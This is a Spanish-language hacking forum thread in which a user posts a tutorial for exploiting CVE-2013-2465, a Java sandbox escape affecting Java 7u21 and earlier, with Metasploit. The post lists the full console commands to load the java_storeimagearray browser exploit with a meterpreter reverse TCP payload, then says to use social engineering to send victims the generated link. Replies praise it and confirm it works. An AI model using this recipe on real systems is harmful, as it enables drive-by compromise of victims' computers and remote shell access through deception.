(http://www.techindustriya.com/backspace/wp-content/uploads/2013/02/apple-java-bug.jpg)
CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing
Este módulo de Metasploit abusa de la vulneravilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.
(http://1.bp.blogspot.com/-yTIKYizC5W4/Uhbq_FUKygI/AAAAAAAAB1A/P6qihaFBJj4/s1600/cve-2013-2465.png)
Explotando CVE-2013-2465 con mestasploit:
// Cargamos el módulo
msf > use exploit/multi/browser/java_storeimagearray
msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_storeimagearray) > set LHOST [IP Local]
msf exploit(java_storeimagearray) > set srvhost [IP Local]
msf exploit(java_storeimagearray) > set uripath /
msf exploit(java_storeimagearray) > exploitAhora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.
Saludos, \0/
Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?
Habrá q probarlo! Gracias!!
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?
Si, de ahi fue donde cree el tutorial. Siempre lo testeo antes de publicarlo.
Saludos...
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Que excelente aporte Stuxnet, no lo conocía, ya has tenido la oportunidad de usarlo?
Si, de ahi fue donde cree el tutorial. Siempre lo testeo antes de publicarlo.
Saludos...
Siempre traduces xDDD
PD: Es totalmente funcional :)
Regards,
Snifer
Nicee!!
Para el blog!
http://blog.underc0de.org/2013/08/cve-2013-2465-java-storeimagearray.html
Muchas gracias Stuxnet! muy buen aporte!
@Snifer yo se que me amas; xD si tradusco la descripción mejor enséñame ingles xD
Saludos.